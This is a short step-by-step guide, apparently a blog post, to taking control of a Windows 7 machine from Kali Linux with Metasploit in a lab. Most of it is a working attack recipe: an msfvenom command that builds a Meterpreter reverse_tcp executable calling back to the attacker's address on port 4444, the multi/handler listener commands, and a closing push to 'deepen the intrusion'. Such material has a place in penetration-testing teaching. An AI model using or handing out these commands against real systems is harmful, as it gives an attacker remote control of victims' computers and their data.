How to Exploit a Windows 7 Machine Using Metasploit on Kali Linux – A Step‑by‑Step Guide

Introduction

Kali Linux is a Debian‑based distribution designed for penetration testing and comes with over 300 pre‑installed tools. Metasploit is a framework for developing and executing security exploits, which can be used directly on Kali Linux. This guide shares a personal testing experience in a controlled internal environment and does not encourage illegal activities.

Test Preparation

Two machines are used:

Source machine running Kali Linux (details shown in the image).

Target machine running Windows 7 (details shown in the image).

Exploitation Setup

1. Create a payload

A payload is a program similar to a virus or trojan that runs on the remote target. The following command creates program.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 -f exe -o program.exe

Use ls to verify the payload file was generated, and cat to inspect it.

2. Launch the Metasploit console

Start the console with: msfconsole 3. Choose the exploit

Set the listening port (e.g., 4444) and the local IP address (LHOST) of the Kali machine, which in this example is 192.168.189.128. You can view the IP with: ifconfig In the console, run: use exploit/multi/handler Then configure the payload: set payload windows/meterpreter/reverse_tcp Set the local address and port:

set LHOST 192.168.189.128

set LPORT 4444

Finally, launch the exploit:

exploit

Successful Exploitation

When program.exe runs on the Windows 7 target, a Meterpreter session is established. Running sysinfo inside the session reveals detailed information about the compromised machine. Further enumeration commands and additional exploits can be used to deepen the intrusion. Use help for a list of available commands.